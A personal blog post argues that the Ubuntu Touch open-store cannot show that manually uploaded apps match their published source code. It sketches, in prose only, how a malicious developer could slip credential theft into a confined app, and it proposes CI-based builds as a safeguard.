AlaskaLinuxUser's Scratchpad

Commit thy works unto the LORD, and thy thoughts shall be established. - Proverbs 16:3

Ubuntu Touch: Are Clicks Secure

I've been spending a lot of time working on Ubuntu Touch clicks lately. For those who don't know, a click is the UT name for an app. If you've been reading my blog, then you'll notice that I'm on a mission to update about 200 apps from the old UT version, Xenial, to the current UT version, Focal. With each update, I make pull requests to help the original dev, or if they are not interested, I fork the project and release the updated version of the click on the open-store.

All of this is well and good, and I've been having a good time doing it. But, as I wondered along, updating clicks/apps, I noticed something peculiar. With each app that is out of date on the open-store, I follow the link to the source code and try to update it and build the click. In a great many cases, what I am finding is that the linked source code does not lead to the actual source code used to build the app.

In most cases, it is a bit of an oversight, as they link to source code that was on Github but moved to Gitlab, or in some cases, it links to the upstream code of a program that wasn't written for Ubuntu Touch, but they used to build the UT click. Unfortunately, these apps are hard to update, since I would have to rebuild the entire clickable portion around the app again, like the original developer must have done years ago. Usually, it is some sort of technical oversight, and not malicious in nature.

However, this lead me to ask a question on the Ubuntu Touch Question and Answer group:

How do I know that the app/click I downloaded from the Ubuntu Touch open-store is actually the same one built from the source code?

They were well intentioned on the Q&A, suggesting that this is solved for "core apps" because they use the Gitlab CI to build the source code in the repository for the app, which then automatically uploads the click, ensuring that whatever was in the Gitlab repo at the time of build was built and uploaded to the open-store.

Well, that sounds pretty good, but that got me thinking. I just uploaded about 20 clicks to the open-store manually, without the Gitlab CI, just uploaded from my laptop, with a link to the source code, but there actually isn't any proof that what I uploaded is the exact build of that source code.

So I asked my question again on the Ubuntu Touch App Developer Telegram channel. They were very helpful and pointed me to the UT Open-Store Telegram channel, and I asked my question again there. I also asked how do I know that something bad wasn't put into the click, since the clicks can be uploaded manually. I was immediately answered by an admin of the channel, who said that I need not worry, since all clicks are confined, and the open-store scans them, and the apparmor policy prevents them from accessing anything they shouldn't.

By the way, for those who don't know, confined is like saying 'sandboxed', meaning that the program can't reach out of it's confined container and steal something else from your phone.

They also explained that if an app/click is going to be unconfined, then the app gets a manual review before release and is built from source by one of their developers on the UT open-store team. Sounds great! I decided that wasn't the answer I was looking for, but fair enough, and I drove on.

However, a few hours later, I was working on the click for uFTP. uFTp, by the way, has no nefarious code, no issues, not problem, but while updating the click for Focal, I realized that an apparmor policy, an open-store scan, and being confined wasn't actually enough. You see, being confined, with a great apparmor policy, an app with some malicious code could even be scanned and not be caught by the open-store, and steal the user's data.

Take the uFTP app, it is an app that allows you to view FTP and SFTP data on a server. It allows you to do this with a login and password, or with RSA keys. Now in the case of uFTP, it actually allows for read and write in the user's home directory, so for our purposes, it is not confined, meaning it is not a good example, but it lead me to the realization of a way a bad actor could steal all the user's data:

Imagine a dev, which we will call 'blackhat' because they are nefarious, decided that they want to steal UT user data. They build a few clicks, one of which is an email app. It is completely confined. Has a great apparmor policy, and has links to all the open source code to build it. Sounds great.

But, 'blackhat' makes the listing on the open-store with links to the good source code, when actually using another repo to build the same source, plus a few lines of code. In the 'blackhat' version, when you set up an email account, and input your username and password, the bad click/app has a debugging flag and sends that information to one of 'blackhats' servers. 'Blackhat' uploads this click on the open-store, it passes the scan, it's apparmor looks good, and the app is confined, so it get's published on the open-store.

Hundreds of users download this new great email app, and immidiately set up their username and password. Networking is part of the click's apparmor, so sending the email credentials is normal, and nothing stops 'blackhat' from owning username and password information for hundred's of users. 'Blackhat' then spends his free time logging into everyone's email, looking at banking information, sends a request to reset bank account passwords... sends your boss an email that you quit... whatever floats his boat, etc., and the poor end user is up a creek without a paddle.

So, I went back to the UT Open-Store Telegram channel, and presented this type of scenario to them. I also wanted to suggest a solution, though not perfect, but better than nothing, which was to disable manual click uploads, and use Gitlab CI uploads instead. Unfortunately, this sparked a somewhat heated debate, some were opposed to my solution, some wanted reproducible builds, some thought there was no possible threat, and others couldn't understand the issue.

In the end, I asked the group to reconsider my scenario, as there was a lot of heated debate about what to do, and asked if they thought my scenario was possible at all, to determine if this was actually a threat and then if it was we could discuss what to do about it.

Unfortunately, this was the group administrator's reply - taken verbatim, as a whole, bad punctuation and all:

any data you share with any app or web site, or even other person, is "at risk" and not something that can be solved through stricter requirements for uploading packages to open-store

Link to admin's reply

At present, it seems that the group admin does not wish to pursue this issue any further. I'm not sure how to take that, to be honest. So, do we not lock our houses, because locks can be broken?

When my home was burglarized in Guam, the police said that it was not breaking and entering, because one of the windows was open. I know that the window was originally locked shut with a padlock (the windows had storm shutter/bars over them) and that the padlock must have been cut off, but the police concluded that no criminal would take the padlock with them. If they broke in, they would just cut the padlock and leave it on the ground. Perhaps then it doesn't really matter?

No, I think that we owe it to open-store users to do a reasonable effort to prove that the app/click they download is actually the one built from the real source code for the app. We could use an authoritative build structure, like an open-store server that builds the apps from source code, or at a minimum, Gitlab CI (other gits have similar), so at least if someone cheats the system, there will be public record on the git, or they will have to go through great pains to cover it up. I don't think we can just assume that the burden of using the clicks and apps in the official UT open store is on the user.

I guess now I just have to see if anyone else in the UT community agrees.

Linux - keep it simple.